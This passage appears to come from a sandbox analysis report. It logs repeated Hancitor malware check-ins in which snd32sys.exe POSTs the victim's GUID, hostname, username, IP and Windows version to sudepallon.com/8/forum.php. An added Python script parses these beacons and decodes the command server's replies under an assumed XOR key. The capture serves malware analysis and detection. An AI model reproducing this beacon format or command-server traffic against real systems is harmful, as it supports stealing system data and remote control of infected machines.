Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:32:01.903317928 CEST | 6050 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:32:03 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 43 41 5a 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cCAZXARRABw==0


Session ID: 24
Source IP: 192.168.2.3
Source Port: 49778
Destination IP: 77.222.42.67
Destination Port: 80
Process: C:\Users\Public\snd32sys.exe

Timestamp: Jul 8, 2021 16:32:02.240464926 CEST
kBytes transferred: 6051
Direction: OUT
Data:
POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)

Timestamp: Jul 8, 2021 16:32:02.306262970 CEST
kBytes transferred: 6051
Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:32:03 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 4b 41 5a 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cKAZPARRABw==0


Session ID: 25
Source IP: 192.168.2.3
Source Port: 49779
Destination IP: 77.222.42.67
Destination Port: 80
Process: C:\Users\Public\snd32sys.exe

Timestamp: Jul 8, 2021 16:32:02.637330055 CEST
kBytes transferred: 6052
Direction: OUT
Data:
POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)

Timestamp: Jul 8, 2021 16:32:02.708657980 CEST
kBytes transferred: 6052
Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:32:04 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 54 48 53 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cTHSGARRABw==0


Session ID: 26
Source IP: 192.168.2.3
Source Port: 49780
Destination IP: 77.222.42.67
Destination Port: 80
Process: C:\Users\Public\snd32sys.exe

Timestamp: Jul 8, 2021 16:32:03.034343958 CEST
kBytes transferred: 6053
Direction: OUT
Data:
POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)

Timestamp: Jul 8, 2021 16:32:03.099986076 CEST
kBytes transferred: 6053
Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:32:04 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 43 48 53 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cCHSXARRABw==0


Session ID: 27
Source IP: 192.168.2.3
Source Port: 49781
Destination IP: 77.222.42.67
Destination Port: 80
Process: C:\Users\Public\snd32sys.exe

Timestamp: Jul 8, 2021 16:32:03.457827091 CEST
kBytes transferred: 6054
Direction: OUT
Data:
POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)

Timestamp: Jul 8, 2021 16:32:03.525928974 CEST
kBytes transferred: 6054
Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:32:05 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 4e 4a 51 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cNJQMARRABw==0


Session ID: 28
Source IP: 192.168.2.3
Source Port: 49782
Destination IP: 77.222.42.67
Destination Port: 80
Process: C:\Users\Public\snd32sys.exe

Timestamp: Jul 8, 2021 16:32:03.970303059 CEST
kBytes transferred: 6055
Direction: OUT
Data:
POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)

Timestamp: Jul 8, 2021 16:32:04.037123919 CEST
kBytes transferred: 6056
Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:32:05 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 4d 54 47 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cMTGNARRABw==0


Session ID: 29
Source IP: 192.168.2.3
Source Port: 49783
Destination IP: 77.222.42.67
Destination Port: 80
Process: C:\Users\Public\snd32sys.exe

Timestamp: Jul 8, 2021 16:32:04.411729097 CEST
kBytes transferred: 6056
Direction: OUT
Data:
POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)

Timestamp: Jul 8, 2021 16:32:04.479322910 CEST
kBytes transferred: 6057
Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:32:05 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 5a 41 5a 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cZAZAARRABw==0


Session ID: 3
Source IP: 192.168.2.3
Source Port: 49757
Destination IP: 77.222.42.67
Destination Port: 80
Process: C:\Users\Public\snd32sys.exe

Timestamp: Jul 8, 2021 16:31:53.509896040 CEST
kBytes transferred: 5499
Direction: OUT
Data:
POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)

Timestamp: Jul 8, 2021 16:31:53.576370001 CEST
kBytes transferred: 5505
Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:31:55 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 51 4b 50 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cQKPJARRABw==0


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
30          192.168.2.3  49784        77.222.42.67    80                C:\Users\Public\snd32sys.exe

[OUT] Jul 8, 2021 16:32:04.784542084 CEST (6057 kBytes transferred)
POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)

[IN] Jul 8, 2021 16:32:04.851527929 CEST (6058 kBytes transferred)
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:32:06 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 4d 4b 50 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: c\r\nMKPNARRABw==\r\n0\r\n\r\n
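The request/reply pair in this session is the Hancitor check-in: a form-encoded beacon POSTed to /8/forum.php and a short chunked reply. The Python below is an added example, not part of the Joe Sandbox report or of the sample; it takes the request and reply bytes from this session's Data Raw lines, splits the beacon into its fields, de-chunks the reply, base64-decodes it and XORs every byte with 0x7A. That key is the one reported for this family and is an assumption here (the report does not state it); the fact that every reply in this capture then ends in the "{n:}" reply (no tasking) supports it. Two points the raw bytes show that the rendered text does not: the Data Raw line carries the real hostname and user (DESKTOP-716T771\hardz) where the report's ASCII rendering shows the anonymized computer\user, and the first three decoded bytes of each reply differ per session; they are left uninterpreted here. SEEN_REPLIES collects the reply tokens from the sessions on this page; the 122-byte length check corresponds to the Content-Length header in the request.

```python
"""Parse one Hancitor check-in/reply pair from the capture above.

Added example; not part of the Joe Sandbox report. Request and reply bytes are
copied from the report's "Data Raw" hex lines (session 30). The XOR key 0x7A
applied to the base64-decoded reply is the key reported for this family and is
an assumption here, not something the report states.
"""
import base64
import re
from urllib.parse import parse_qsl

XOR_KEY = 0x7A  # assumption: single-byte key reported for Hancitor replies

# POST body from the report's "Data Raw" line: 122 bytes, as Content-Length says.
CHECKIN_BODY = bytes.fromhex(
    "47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 "
    "26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f "
    "3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 "
    "31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e "
    "31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 "
    "34 29"
)

# Chunked reply body from the same session's "Data Raw" line.
RESPONSE_BODY = bytes.fromhex(
    "63 0d 0a 4d 4b 50 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a"
)

# Reply tokens seen across the sessions on this page (from their Data Ascii lines).
SEEN_REPLIES = [
    "QKPJARRABw==", "MKPNARRABw==", "CNMXARRABw==", "BKPYARRABw==",
    "BZAYARRABw==", "QKPJARRABw==", "AQJZARRABw==", "JMNQARRABw==",
]

EXPECTED_FIELDS = {"GUID", "BUILD", "INFO", "EXT", "IP", "TYPE", "WIN"}
COMMAND_RE = re.compile(rb"\{([a-z]):([^}]*)\}")


def parse_checkin(body: bytes) -> dict:
    """Split the form-encoded beacon into its fields (the empty EXT is kept)."""
    return dict(parse_qsl(body.decode("latin-1"), keep_blank_values=True))


def split_info(info: str) -> tuple:
    """INFO is '<number> @ <hostname>\\<username>'; return the three parts."""
    number, _, account = info.partition(" @ ")
    host, _, user = account.partition("\\")
    return number, host, user


def is_hancitor_checkin(fields: dict) -> bool:
    """Field set and INFO layout of the beacon seen in this capture."""
    return set(fields) == EXPECTED_FIELDS and " @ " in fields.get("INFO", "")


def dechunk(body: bytes) -> bytes:
    """Reassemble an HTTP/1.1 chunked body: hex size line, data, CRLF, ... , '0'."""
    out = bytearray()
    pos = 0
    while True:
        end = body.index(b"\r\n", pos)
        size = int(body[pos:end].split(b";")[0], 16)  # drop any chunk extension
        pos = end + 2
        if size == 0:
            break
        out += body[pos:pos + size]
        pos += size + 2  # skip the CRLF that terminates the chunk data
    return bytes(out)


def decode_response(token: bytes, key: int = XOR_KEY) -> bytes:
    """Base64-decode the de-chunked reply, then XOR each byte with the key."""
    return bytes(b ^ key for b in base64.b64decode(token))


def extract_commands(plain: bytes) -> list:
    """Return (opcode, argument) pairs found in the decoded reply."""
    return [(op.decode(), arg.decode("latin-1")) for op, arg in COMMAND_RE.findall(plain)]


if __name__ == "__main__":
    fields = parse_checkin(CHECKIN_BODY)
    print("beacon fields:", fields, "hancitor-shaped:", is_hancitor_checkin(fields))
    print("host/user from raw bytes:", split_info(fields["INFO"])[1:])
    plain = decode_response(dechunk(RESPONSE_BODY))
    print("decoded reply:", plain, "->", extract_commands(plain))
    for token in SEEN_REPLIES:
        print(token, "->", decode_response(token.encode()), extract_commands(decode_response(token.encode())))
```

The decoder only relies on the two transforms the reply bytes visibly need (chunked framing and base64) plus the assumed XOR key; if the key is wrong the brace-delimited command never appears, which is an easy sanity check when applying this to another capture.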


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
31          192.168.2.3  49785        77.222.42.67    80                C:\Users\Public\snd32sys.exe

[OUT] Jul 8, 2021 16:32:05.179541111 CEST (6059 kBytes transferred)
POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)

[IN] Jul 8, 2021 16:32:05.246893883 CEST (6059 kBytes transferred)
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:32:06 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 43 4e 4d 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: c\r\nCNMXARRABw==\r\n0\r\n\r\n


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
32          192.168.2.3  49786        77.222.42.67    80                C:\Users\Public\snd32sys.exe

[OUT] Jul 8, 2021 16:32:05.567929029 CEST (6060 kBytes transferred)
POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)

[IN] Jul 8, 2021 16:32:05.634110928 CEST (6060 kBytes transferred)
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:32:07 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 42 4b 50 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: c\r\nBKPYARRABw==\r\n0\r\n\r\n


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
33          192.168.2.3  49787        77.222.42.67    80                C:\Users\Public\snd32sys.exe

[OUT] Jul 8, 2021 16:32:05.990741968 CEST (6061 kBytes transferred)
POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)

[IN] Jul 8, 2021 16:32:06.056196928 CEST (6061 kBytes transferred)
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:32:07 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 42 5a 41 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: c\r\nBZAYARRABw==\r\n0\r\n\r\n


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
34          192.168.2.3  49788        77.222.42.67    80                C:\Users\Public\snd32sys.exe

[OUT] Jul 8, 2021 16:32:06.570564985 CEST (6062 kBytes transferred)
POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)

[IN] Jul 8, 2021 16:32:06.643687010 CEST (6062 kBytes transferred)
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:32:08 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 51 4b 50 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: c\r\nQKPJARRABw==\r\n0\r\n\r\n


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
35          192.168.2.3  49789        77.222.42.67    80                C:\Users\Public\snd32sys.exe

[OUT] Jul 8, 2021 16:32:07.036962032 CEST (6063 kBytes transferred)
POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)

[IN] Jul 8, 2021 16:32:07.106313944 CEST (6063 kBytes transferred)
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:32:08 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 41 51 4a 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: c\r\nAQJZARRABw==\r\n0\r\n\r\n


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
36          192.168.2.3  49790        77.222.42.67    80                C:\Users\Public\snd32sys.exe

[OUT] Jul 8, 2021 16:32:07.823514938 CEST (6064 kBytes transferred)
POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)

[IN] Jul 8, 2021 16:32:07.890404940 CEST (6065 kBytes transferred)
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:32:09 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 4a 4d 4e 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: c\r\nJMNQARRABw==\r\n0\r\n\r\n


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
37 | 192.168.2.3 | 49791 | 77.222.42.67 | 80 | C:\Users\Public\snd32sys.exe

Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:32:08.232155085 CEST | 6065 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
